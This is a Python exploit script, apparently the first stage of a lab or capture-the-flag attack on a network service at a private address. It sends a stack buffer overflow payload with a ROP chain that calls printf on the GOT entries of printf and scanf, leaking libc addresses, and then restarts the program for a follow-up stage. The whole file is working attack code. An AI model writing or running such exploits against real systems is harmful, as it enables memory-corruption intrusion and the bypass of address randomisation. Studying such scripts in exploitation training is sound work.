got_leak_part1.py

#!/usr/bin/env python3
from struct import pack,unpack
from telnetlib import Telnet
import socket
import sys

TARGET = ("192.168.43.115",5555)            # Target IP and PORT

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)# Make a TCP socket

p64 = lambda x: pack("Q",x)                 # To Convert to little endian
u64 = lambda x: unpack("Q",x)[0]            # Convert leaked bytes to address.

def checkTerms(term,payload):               # function to check for any bad chars in payload.
    if term in payload:
        print("Found",hex(ord(term)),"in payload, exit.")
        sys.exit(0)                         # exit if there are bad chars in payload.

start       = 0x400530
printf_plt  = 0x400500
printf_got  = 0x601018
scanf_got   = 0x601028
perc_s      = 0x400758
pop_rdi     = 0x400723
pop_rsi_r15 = 0x400721

buf = b'A'*216              # payload in bytes form for python3 to send through socket.
buf+= p64(pop_rdi)
buf+= p64(perc_s)           # goes to rdi
buf+= p64(pop_rsi_r15)
buf+= p64(printf_got)       # goes to rsi
buf+= p64(printf_got)       # goes to r15
buf+= p64(printf_plt)

buf+= p64(pop_rdi)
buf+= p64(perc_s)           # goes to rdi
buf+= p64(pop_rsi_r15)
buf+= p64(scanf_got)        # goes to rsi
buf+= p64(scanf_got)        # goes to r15
buf+= p64(printf_plt)

buf+= p64(start)            # start the program again.
checkTerms(b'\n',buf)       # newline is a bad char if between payload.
buf+= b'\n'                 # add new line at end to enter input.
checkTerms(b'\x20',buf)     # whitespace is a bad char.

print("[i] Payload ready.")
s.connect(TARGET)           # connect to target server
print(s.recv(1024))
s.send(buf)                 # send payload
print("[i] Payload sent.")
resp=s.recv(1024)           # receive response.
print("[i] Reply received.")
print(resp)